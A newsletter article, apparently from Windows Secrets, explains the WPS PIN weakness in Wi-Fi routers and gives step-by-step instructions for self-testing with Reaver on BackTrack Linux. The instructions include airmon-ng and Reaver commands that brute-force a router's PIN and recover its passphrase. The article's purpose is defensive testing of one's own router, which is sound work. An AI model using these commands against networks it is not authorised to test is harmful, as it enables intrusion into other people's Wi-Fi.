If your Wi-Fi router supports Wi-Fi Protected Setup (WPS) — and most newer home/small-business routers do — it might easily reveal its passwords to a readily available hacking tool.
You can use that tool to be 100 percent certain your router isn’t vulnerable to malicious WPS hacking. Here’s how.
Recap: Why WPS routers are typically not secure
Think your Wi-Fi router’s safe because you use a long and complex passphrase? Think again! In the Dec. 13 Top Story, I discussed a fundamental security flaw in most routers using WPS technology.
In short, all WPS-enabled routers have a built-in, easily hackable back door: a simple, vendor-assigned PIN (personal identification number) of just six to eight numerals. This PIN can easily be guessed by free hacker tools that run on ordinary laptops — or even smartphones.
A hacked WPS PIN opens the door to your entire Wi-Fi network. With the correct PIN, an attacker can recover a router’s passphrase, giving him full access to a Wi-Fi network. Here are the key points from last week’s story:
- All WPS-enabled routers are vulnerable to this kind of PIN hacking.
- The only way to prevent this type of hacking is to disable WPS.
- Some routers are supposed to time-limit or otherwise automatically disable WPS, but there’s no obvious way to know whether this is working.
- Some router configuration software is faulty; even if you disable WPS in the router’s setup menus, WPS will actually still remain active — and vulnerable.
- The only sure way to determine whether your router is vulnerable to WPS PIN hacking is to test-hack it yourself. The easiest way to do so is with a free, open-source, white-hat hacking tool called Reaver.
In this article, I’ll walk you through the use of Reaver and some associated tools so you can see whether your own network is vulnerable to WPS hacking.
Note: Reaver’s intended use is to sniff out router vulnerabilities so they can be corrected. However, black-hat hackers can also use it to steal PINS or for other malicious purposes. I shouldn’t have to say this, but for the record:
Please don’t use Reaver for any purpose other than testing your own router’s security!
Let’s get started!
Building a bootable Linux system with BackTrack
Reaver is a Linux-based tool that’s almost absurdly easy to use. A simple, one-line command sets off its WPS PIN-sniffing process. If your router is vulnerable, Reaver will find its PIN within a few hours. It will then use the PIN to recover and reveal the router’s passphrase — as simple as that.
For many Windows users, the hardest part of using Reaver is getting Linux going and gathering the Wi-Fi configuration information Reaver requires.
Fortunately, there’s an easy shortcut: run Reaver via a preconfigured, live Linux installation on a bootable DVD. There’s almost no setup or configuration involved; no partitioning, reformatting, or any similar operations; and your original Windows setup remains untouched and unchanged.
There are many bootable Linux distributions (versions) available, but I picked BackTrack 5, a self-contained, free, bootable, Debian Linux installation that’s optimized for network security testing. The BackTrack home page has links to hardware and Wi-Fi compatibility information, how-tos, troubleshooting, training info, FAQs, and more. It’s worth spending some time there.
Here’s how to install BackTrack 5, step by step.
- When you’re ready to go, grab a free copy of BackTrack from its download page. As shown in Figure 1, I chose a 32-bit, ISO, Gnome-desktop version of the BackTrack Live DVD, downloaded directly (not via Torrent) to my Windows-based PC. All following screenshots are based on that version of BackTrack.
- Once the 3.1GB download finished, I burned it to DVD. (Need help? See Microsoft’s article, “Burn ISO images natively in Windows 7.”)
- Now insert the bootable BackTrack disc into your Wi-Fi-capable desktop or laptop and reboot.
Initially, the BackTrack DVD boots to a plain screen showing just a line of informational text and a Linux command prompt that says, simply, boot. When you see that prompt, press Enter.
- Next, you’ll see a screen labeled BackTrack 5 CD. BackTrack’s boot process pauses to let you select various optional configurations. For our purposes, the default choice — BackTrack Text (selected in Figure 3) — is fine. Press Enter — or do nothing and let BackTrack automatically boot in 30 seconds.
- After a flurry of system activity, you’ll see at the bottom of the screen a text-mode command prompt. Mine read: root@bt:~#, but yours might be slightly different, depending on your setup.
- Now launch BackTrack’s full graphical desktop interface. Type startx at the command prompt and press Enter.
- After a few moments, BackTrack’s desktop will appear. You now have a familiar point-and-click environment that’s conceptually much like Windows.
- Currently, BackTrack 5 does not come with Reaver preinstalled, but it’s simple to add it. To start, you need to connect temporarily to your Wi-Fi network.
On BackTrack’s main screen, click Applications/Internet/Wicd Network Manager.
- If your network is broadcasting its service-set identifier (SSID — your network’s name), select it from the resulting list. Click Connect and enter your Wi-Fi network’s normal passphrase.
If you’ve previously disabled SSID broadcasting, click Wicd Network Manager’s Network button and select Find a Hidden Network. Type in your network’s SSID and passphrase.
To download and install Reaver — and to do your test-hacking later — you need to open a Linux command-line Terminal window.
- Next, update BackTrack’s list of available apps by typing the following string at the command prompt:
- When the update is finished, install Reaver by typing the following text at the command prompt:
apt-get install reaver
- With Reaver installed (it has no graphical interface; just follow the text that appears on-screen), go back to the Wicd Network Manager window and click Disconnect to turn off your Wi-Fi connection.
Identifying your specific wireless LAN
The next step is to gather some information about your specific Wi-Fi interface and setup. Fortunately, all the tools you’ll need are built into BackTrack.
- Start by finding your system’s wireless LAN (wlan) interface identifier. It’s easy: At a Terminal window’s command prompt, type iwconfig and press Enter. Next, look for an entry labeled wlan[X], where [X] is a number such as 0, 1, or 2. Most systems’ wireless LAN interface will be wlan0, as highlighted in Figure 11.
- Now, put your wireless card into monitor mode so it can listen passively to all the Wi-Fi routers within range. Enter the following command at a terminal window’s prompt:
airmon-ng start wlan0
(If your wireless interface was identified as wlan1, wlan2, or some other designator, use that instead of wlan0.)
- You’ll see output that looks something like what’s shown in Figure 12. Make note of the monitor mode enabled on mon[X] line (again, [X] will be a number such as 0, 1, 2, etc.). In most cases, the monitor mode will be mon0.
A brief technical aside might make the next step easier to understand. As mentioned earlier, your Wi-Fi router’s SSID is the network name it broadcasts. But an SSID actually has two separate, independent components: the human-friendly name of a Wi-Fi network, formally known as the ESSID (extended service set identifier); and a manufacturer-assigned, alphanumeric, machine-friendly BSSID (basic service set identifier).
- The next step is to find your router’s BSSID. In a terminal window, type:
As before: if necessary, change the wlan0 to match your Wi-Fi LAN’s designator.
- The above command will produce a live display (or dump) of information from all Wi-Fi LANs in range of your system. Find your LAN’s ESSID (human-friendly name) on the right side of the list, and then make a note of its associated BSSID on the left. In this case, my ESSID is NETGEAR and the BSSID is A0:21:B7:B0:D1:A1.
If you previously disabled SSID broadcasting, and your router does not appear on the airodump-ng listing, congratulations! Your router should not be vulnerable to WPS hacking. You’re done — you don’t have to go on to the next steps.
On the other hand, if your router does appear on the list, it’s time to get, ah, cracking with Reaver.
Letting Reaver do its PIN-cracking thing
A Reaver run typically takes two to 10 hours. It’s best to start Reaver in the evening (when you don’t need your PC or your Wi-Fi) and let it run overnight. You can check the results in the morning.
The following steps will work in the majority of cases, but if you run into trouble getting Reaver to work, check out its wiki, FAQ, hardware-compatibility info, etc. on the Reaver site. If that doesn’t help, there’s a list of additional resources at the end of this article.
- Set Reaver loose on your network with the following one-line command, entered in a BackTrack Terminal window. Replace the items in square brackets with your network’s specific designators.
reaver -i mon[X] -b [BSSID] -vv
For example, using my mon0 monitor interface and A0:21:B7:B0:D1:A1 BSSID, my command is:
reaver -i mon0 -b A0:21:B7:B0:D1:A1 -vv
- Press Enter; Reaver will then try to initiate a WPS session with your router (repeatedly, if necessary) and will then try to hack in by plodding through all possible WPS PIN codes — one after another.
Figure 14 shows the kinds of messages it might display as it attempts to hack your WPS PIN.
If you previously turned off WPS and/or disabled SSID broadcasting in your router’s configuration screens (as recommended in last week’s Top Story), Reaver will fail to find a working PIN and passphrase. If so, congratulations! You’re safe from WPS hacking.
But if Reaver finds a working PIN (and/or the router’s passphrase), it will be displayed on-screen. In that case, you’ll know that your router is vulnerable to WPS hacking. Thank your lucky stars that you found this vulnerability before local hackers did!
To possibly eliminate the WPS vulnerability, check your router manufacturer’s support pages to see whether there’s a new firmware update available for your router. If so, download and install the new firmware, and then re-test the new setup with Reaver.
If the updated firmware also succumbs to Reaver, your only real options are to get a better, newer router that properly controls and disables WPS, or replace the factory firmware with third-party firmware from a resource such as the open-source dd-wrt.com (site).
And of course, test the new router or firmware with Reaver, too!
Additional instructions, info, and tools
These links to online sites should provide everything you could want to know about WPS and Reaver.
- Wikipedia: Wi-Fi Protected Setup
- Smallnetbuilder.com: How is WPS supposed to work?
- Threatpost.com: Attack tool released for WPS PIN vulnerability
- Arstechnica.com: Researchers publish open-source tool for hacking Wi-Fi Protected Setup
- H-online.com: Wi-Fi Protected Setup made easier to brute force
- Reaver-wps: Wiki, FAQ, etc.
- Tacnetsol.com: Cracking Wi-Fi Protected Setup with Reaver
- Arstechnica.com: Hands-on: hacking Wi-Fi Protected Setup with Reaver
- Lifehacker.com: How to crack a Wi-Fi network’s WPA password with Reaver
Subscribe to our Windows Secrets Newsletter - It's Free!
Get our unique weekly Newsletter with tips and techniques, how to's and critical updates on Windows 7, Windows 8, Windows XP, Firefox, Internet Explorer, Google, etc. Join our 480,000 subscribers!
Subscribe and get our monthly bonuses - free!
Get a real feel for Windows 8.1 with a wealth of tips in this step-by-step guide. This month, Windows Secrets subscribers can download the first 2 chapters for free: Using Windows 8.1 and Using Email and the Internet. Get this excerpt and other 5 bonuses if you subscribe now!